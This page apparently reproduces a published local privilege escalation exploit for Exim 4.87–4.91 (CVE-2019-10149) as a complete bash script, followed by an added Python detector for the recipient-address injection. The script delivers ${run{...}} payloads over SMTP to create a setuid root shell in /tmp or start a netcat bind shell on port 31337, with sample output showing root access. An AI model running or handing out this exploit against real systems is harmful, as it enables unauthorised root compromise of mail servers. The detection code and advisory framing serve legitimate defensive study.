Exim 4.91 Local Privilege Escalation

17 Jun 2019. Reported by Marco Ivaldi. Type: packetstorm. Source: packetstormsecurity.com

Exim 4.91 Local Privilege Escalation, "The Return of the WIZard" LPE exploit. A flaw in Exim 4.87 through 4.91 (CVE-2019-10149) allows remote command execution; this script uses it locally and was tested against Exim 4.89 on Debian GNU/Linux 9.

Code
```bash
#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <[email protected]>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
	echo "$0 [-m METHOD]"
	echo
	echo "-m setuid : use the setuid payload (default)"
	echo "-m netcat : use the netcat payload"
	echo
	exit 1
}

# payload delivery
function exploit()
{
	# connect to localhost:25
	exec 3<>/dev/tcp/localhost/25

	# deliver the payload
	read -u 3 && echo $REPLY
	echo "helo localhost" >&3
	read -u 3 && echo $REPLY
	echo "mail from:<>" >&3
	read -u 3 && echo $REPLY
	echo "rcpt to:<$PAYLOAD>" >&3
	read -u 3 && echo $REPLY
	echo "data" >&3
	read -u 3 && echo $REPLY
	for i in {1..31}
	do
		echo "Received: $i" >&3
	done
	echo "." >&3
	read -u 3 && echo $REPLY
	echo "quit" >&3
	read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>'
echo

# parse command line
while [ ! -z "$1" ]; do
	case $1 in
		-m) shift; METHOD="$1"; shift;;
		* ) usage
		;;
	esac
done
if [ -z $METHOD ]; then
	usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

	# prepare a setuid shell helper to circumvent bash checks
	echo "Preparing setuid shell helper..."
	echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
	gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
	if [ $? -ne 0 ]; then
		echo "Problems compiling setuid shell helper, check your gcc."
		echo "Falling back to the /bin/sh method."
		cp /bin/sh /tmp/pwned
	fi
	echo

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_SETUID
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	ls -l /tmp/pwned
	/tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_NETCAT
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	nc -v 127.0.0.1 31337

# print help
else
	usage
fi
```
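The exploit above works because an Exim string-expansion item (`${run{...}}`, with `\xNN` and `\t` escapes standing in for slashes, quotes and spaces) is accepted as the local part of a `RCPT TO` address and later expanded during delivery. From a defender's side the two useful checks are: is this host running an affected release (4.87 to 4.91), and do SMTP transcripts or logs show recipient addresses carrying expansion items. The following Python is an added example written for this page; it is not part of the original exploit or of Exim. The version banner format is the `Exim version X.Y` line printed by `exim -bV`; the transcript lines are constructed sample input, and the findings labels are this example's own.

```python
"""Defender-side triage for CVE-2019-10149-style recipient-address abuse.

Added example, not part of the original exploit. Two checks:
  1. is_affected_version(): does an 'exim -bV' banner fall in 4.87..4.91?
  2. scan_transcript(): which RCPT TO addresses carry ${run{...}} items?
"""
import re
from typing import List, Optional, Tuple

# Affected range as stated by the advisory quoted on this page (inclusive).
AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)

VERSION_RE = re.compile(r"Exim version (\d+)\.(\d+)")


def parse_exim_version(banner: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from an 'Exim version 4.89 #1 ...' banner line."""
    m = VERSION_RE.search(banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_affected_version(banner: str) -> bool:
    """True when the banner names a release in the affected 4.87..4.91 range."""
    v = parse_exim_version(banner)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX


# Escapes understood by Exim's string expander that the payload uses to keep
# '/', '"', ';' and whitespace out of the literal address: \xNN, \t, \n.
_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\([tn])")


def decode_exim_escapes(s: str) -> str:
    """Render \\xNN / \\t / \\n escapes so the address is inspected in clear form."""
    def repl(m: "re.Match") -> str:
        if m.group(1):
            return chr(int(m.group(1), 16))
        return {"t": "\t", "n": "\n"}[m.group(2)]
    return _ESC_RE.sub(repl, s)


RUN_RE = re.compile(r"\$\{\s*run\s*\{", re.IGNORECASE)
RCPT_RE = re.compile(r"rcpt to:\s*<(.*)>", re.IGNORECASE)


def recipient_findings(addr: str) -> List[str]:
    """Reasons (example's own labels) why a recipient looks like expansion injection."""
    decoded = decode_exim_escapes(addr)
    findings: List[str] = []
    if RUN_RE.search(decoded):
        findings.append("run-expansion")      # ${run{...}} present in the address
    if len(re.findall(r"\\x[0-9a-fA-F]{2}", addr)) >= 3:
        findings.append("hex-escapes")        # heavy \xNN obfuscation of the local part
    if "/bin/sh" in decoded:
        findings.append("shell-path")         # decoded command invokes a shell
    return findings


def scan_transcript(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line_index, address, findings) for every suspicious RCPT TO line."""
    hits = []
    for i, line in enumerate(lines):
        m = RCPT_RE.search(line)
        if not m:
            continue
        findings = recipient_findings(m.group(1))
        if findings:
            hits.append((i, m.group(1), findings))
    return hits


# Constructed SMTP transcript: one benign recipient, one carrying an expansion
# item in the same escaped style as the payload on this page (it only runs 'id').
SAMPLE_TRANSCRIPT = [
    "helo localhost",
    "mail from:<>",
    "rcpt to:<alice@example.org>",
    r"rcpt to:<${run{\x2fbin\x2fsh\t-c\t\x22id\x22}}@localhost>",
    "data",
]

if __name__ == "__main__":
    print(is_affected_version("Exim version 4.89 #1 built 12-Mar-2017"))
    for idx, addr, why in scan_transcript(SAMPLE_TRANSCRIPT):
        print(f"line {idx}: {addr!r} -> {', '.join(why)}")
```

The decode step matters: matching on the literal `${run{` alone is enough for this exploit, but the path and quotes are what identify the command, and they only appear after the `\xNN` escapes are rendered. Run the same `recipient_findings` over the recipient field of Exim's mainlog entries to retro-hunt delivery attempts.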


Published: 17 Jun 2019. Vulners AI Score: 0.9 (low risk). EPSS: 0.93918.